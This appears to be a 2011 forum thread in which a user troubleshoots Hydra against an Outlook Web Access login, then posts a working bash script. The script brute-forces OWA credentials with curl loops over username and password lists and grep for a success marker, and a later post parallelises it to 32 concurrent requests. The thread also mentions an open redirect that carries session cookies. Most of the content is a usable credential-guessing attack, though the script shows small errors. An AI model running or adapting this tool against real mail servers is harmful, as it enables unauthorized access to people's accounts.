Results 1 to 7 of 7

Thread: "302 Moved Temporarily" problem when using Hydra - OWA "Outlook Web Access"

Hybrid View

  1. #1
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default "302 Moved Temporarily" problem when using Hydra - OWA "Outlook Web Access"

    I have problems getting results from hydra when testing a OWA-only enabled mail server:
    Code:
    hydra -l leo -p 123 mail.company.com  https-post-form "/exchweb/bin/auth/owaauth.dll:destination=https%3A%2F%2Fmail.company.com%2Fexchange%2F&flags=0&username=Domain%5C^USER^&password=^PASS^&I1.x=0&I1.y=0:You could not be logged"
    then I get a bunch of errors "BAD Request" and false positives.

    I got the POST data from running OWASP ZAP as proxy.

    here's what happens:
    #1- [REQUEST] POST https://mail.company.com/exchweb/bin/auth/owaauth.dll <-- along with the POST data
    #1- [RESPONSE] HTTP/1.1 302 Moved Temporarily -- Location: https://mail.company.com/exchange/ <-- with a couple of set-cookie's
    #2- [REQUEST] GET https://mail.company.com/exchange/
    #2- [RESPONSE] HTTP/1.1 302 Moved Temporarily -- Location: https://mail../../owalogon.asp?url=h...ange/&reason=2
    #3- I "GET" the same login page with "&reason=2" that will display the error message "You could not be logged..."

    The problem is that hydra expects to see in the body of the response the text "You could not be logged" at "#1" to determine if the password is correct or not, and since the response is a 302 without a body, it just assumes that the password has been found and not follow the 302 directions till it gets an actual body in a reply.

    any ideas? "i tried owabf.py, it just didn't work for me, all false positives"
    Thanks in advance.

  2. #2
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: "302 Moved Temporarily" problem when using Hydra - OWA "Outlook Web Access"

    What happens if you make your failure string "reason" or "reason=2"?

    Instead of targeting the web interface is there a POP3 or IMAP interface you could bruteforce?
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  3. #3
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default Re: "302 Moved Temporarily" problem when using Hydra - OWA "Outlook Web Access"

    Won't(didn't) work since Hydra will look for it in the body, not URI, also hydra doesn’t even follow the redirection to the stage where “reason=2” shows up.
    Let me show you the output with –v:

    Code:
    Hydra v6.2 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
    Hydra (http://www.thc.org/thc-hydra) starting at 2011-04-21 03:49:33
    [VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 1.
    [DATA] 1 tasks, 1 servers, 1 login tries (l:1/p:1), ~1 tries per task
    [DATA] attacking service http-post-form on port 443
    [VERBOSE] Resolving addresses ... done
    [STATUS] attack finished for mail.company.com (waiting for children to finish)
    HTTP/1.1 302 Moved Temporarily
    Content-Length: 0
    Location: https://mail.company.com/exchange/
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Set-Cookie: sessionid=4df5a08a-c477-48d9-xxxx-c919cc4b7b06; path=/
    Set-Cookie: cadata="1++akuxxxY3baBWj2fxxxxxYjaL5stueaBcOIqvJmJ6rVWKepNtA=="; HttpOnly; secure; path=/
    Date: Thu, 21 Apr 2011 02:49:35 GMT
    Connection: close
    As you can see, it just looked at the reply, and didn’t follow…

    HOWEVER, you gave me an excellent idea, will use “302 Moved” as the failure string hoping that the reply will change if I’m successful “even though I believe OWA decided I don’t have the right to view https://mail.company.com/exchange/ using GET with the given cookies at the second redirect, not this one”, will install exchange and OWA on my lab to test and will keep you informed.

    and regarding your second question, it’s only OWA enabled.

    In the meantime, anyone else have ideas about brute-ing OWA ?
    Last edited by SherifEldeeb; 04-21-2011 at 03:07 AM.

  4. #4
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default Re: "302 Moved Temporarily" problem when using Hydra - OWA "Outlook Web Access"

    More on the "help-you-so-you-might-help-me" information:
    The " https://mail.company.com/exchange/" comes from the POST data parameter "destination=https%3A%2F%2Fmail.company.com%2Fexch ange%2F" which is mandatory "i.e. when I removed it from the POST data at the intercepting-proxy, or making it 'destination=&...' it gave me 400 Bad Request".

    and when I modify it to something like "google.com" it 302 redirect me to google.com! with the set cookies!!!! "that's a damn serious issue with that web application that could be used to hijack sessions among other things!!! but let's focus on the brute forcing".

    So, I believe the 302 redirection will ALWAYS happen.

    help, ...please, anyone?.

    "P.S. will open owabf.py and see how it works(not), even though I'm not good at python."
    EDIT: owabf.py checks in the body of the reply for a string that indicates a "STANDARD" image file href known to be there when rejected, ...modified and still not working"

    EDIT: I'll just write my own bash script that uses "cURL -L -s" and do it myself will post it here once I get it done ...
    Last edited by SherifEldeeb; 04-21-2011 at 04:59 AM.

  5. #5
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default Re: "302 Moved Temporarily" problem when using Hydra - OWA "Outlook Web Access"

    I did a very simple bash script (i'm by no means a pro) that did what I want, I'm sharing this so maybe someone else might find anything useful in it.
    however, it is S L O W (no multi threading), lack error handling, has lots of hard coded data in it, and the output is not very descriptive when a successful user:pass is found.
    if you want to use it, change the post data since mine was slightly modded from the std, and make sure its http/https.

    Code:
    script.sh usernames passlist mail.company.com
    it uses 'curl'
    -d "POST data" <-- this is where the user & pass will go, I did two nested for loops to go through the lists.
    -L to follow the 302 redirects
    -s to be silent and not display the HTTP headers
    then piped the output to grep to show if a certain sentence I know that it exists in the inbox page shows up.


    Stupid, but works.

    Code:
    #!/bin/bash
    show_help(){
    echo YAOWAB "Yet another Outlook Web Access Brute-forcer"
    echo Usage: $0 USERNAME_LIST PASSWORD_LIST WEBMAIL_SITE
    echo by sherif eldeeb.
    }
    
    ########## STANDARD CHECKS BEFORE STARTING #########
    
    #checking number of arguments, if less than 3, exit!
    if [ $# -lt 3 ]
    then
      echo [-] ERROR: Arguments are less than 3
      echo
      show_help;
      exit 1
    fi
    
    #checking the existence of username file,
    if [ -f $1 ] 
    then 
      echo[*] Using $1 as username list
    else
    	echo [-] ERROR: Username file doesn\'t exist
    	echo
    	show_help;
    	exit 1
    fi
    
    #checking the existence of passwords file, 
    if [ -f $2 ] 
    then 
       echo[*] Using $2 as username list
    else
    	echo [-] ERROR: Passwords file doesn\'t exist
    	echo
    	show_help;
    	exit 1
    fi
    
    # curl check
    which curl>/etc/null
    if [ $? -ne 0 ] ; then
    	echo '[-] ERROR: 'curl' not found! exiting...'
    	exit
    fi
    
    ############ END OF STANDARD CHECKS   ##############
    
    echo[*] Starting...
    for k in $(cat $1)
    do
    	for i in $(cat $2)
    	do
    		echo[*] Trying \"$k\" with password \"$i\"...
    		curl -d "destination=https%3A%2F%2F$3%2Fexchange&flags=0&username=$k&password=$i&I1.x=0&I1.y=0" https://$3/exchweb/bin/auth/owaauth.dll -L -s -b cookies.txt | grep -i "This page uses frames, but your browser doesn"
    	done
    done
    Last edited by SherifEldeeb; 04-24-2011 at 05:00 AM. Reason: user:Pass was interestingly interpreted to "user ass" after changing ":p" to a smiley with a tongue out of its mouth...

  6. #6
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default Re: "302 Moved Temporarily" problem when using Hydra - OWA "Outlook Web Access"

    This is going to be my last question in this thread:
    Is there a way to make the bash script always have 16 instance of curl running "like hydra" to speed thing up?

    adding the "&" to the end of line will choke the machine and will fail "will send all the user pass pairs AT ONCE", and doing a for loop with 16 will wait till ALL the 16 are done then it initialize the next 16 batch, right?

  7. #7
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default Re: "302 Moved Temporarily" problem when using Hydra - OWA "Outlook Web Access"

    Even though it is very, very obvious that I'm probably talking to myself regarding my own issue here on the forum, I'll list a solution I found that enabled me to run 32 instances of curl at once, then back off if the number of curl processes exceeded 32, then launch another 32 curl again, the concept applies to anything "bash-able".

    just modify the following lines
    Code:
    for k in $(cat $1)
    do
    	for i in $(cat $2)
    	do
    		echo[*] Trying \"$k\" with password \"$i\"...
    		curl -d "destination=https%3A%2F%2F$3%2Fexchange&flags=0&username=$k&password=$i&I1.x=0&I1.y=0" https://$3/exchweb/bin/auth/owaauth.dll -L -s -b cookies.txt | grep -i "This page uses frames, but your browser doesn"
    	done
    done
    to look like this

    Code:
    for k in $(cat $1)
    do
    	for i in $(cat $2)
    	do
    		CurlCount=$(pidof curl | wc -w)
                    [ $CurlCount -ge 32  ] && continue
    		echo[*] Trying \"$k\" with password \"$i\"...
    		curl -d "destination=https%3A%2F%2F$3%2Fexchange&flags=0&username=$k&password=$i&I1.x=0&I1.y=0" https://$3/exchweb/bin/auth/owaauth.dll -L -s -b cookies.txt | grep -i "This page uses frames, but your browser doesn" &
    	done
    done
    Please note the "&" at the end of the long curl command...

    That did the trick, I got very good results "speed was very comparable to hydra after adding the target domain to /etc/hosts snice it was DNS resolving it EVERYTIME".

    I'm a happy man again.

    P.S: I am pretty sure there's a much {easier, faster, better} way to do it, but I only know little bash, and that's it.
    P.S: I just realized that I have to add another "break" statement... will modify this post later...
    Last edited by SherifEldeeb; 04-24-2011 at 10:43 AM.

Similar Threads

  1. Replies: 4
    Last Post: 02-24-2011, 04:52 PM
  2. File Managment Problem "Access Denied"
    By FurryTurtle in forum Beginners Forum
    Replies: 4
    Last Post: 07-16-2010, 10:42 AM
  3. Replies: 9
    Last Post: 06-26-2010, 07:03 PM
  4. Silly question: Where are "home" and "system" icons ?
    By fjecp in forum Beginners Forum
    Replies: 2
    Last Post: 04-07-2010, 08:57 PM
  5. Replies: 17
    Last Post: 10-04-2007, 03:54 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •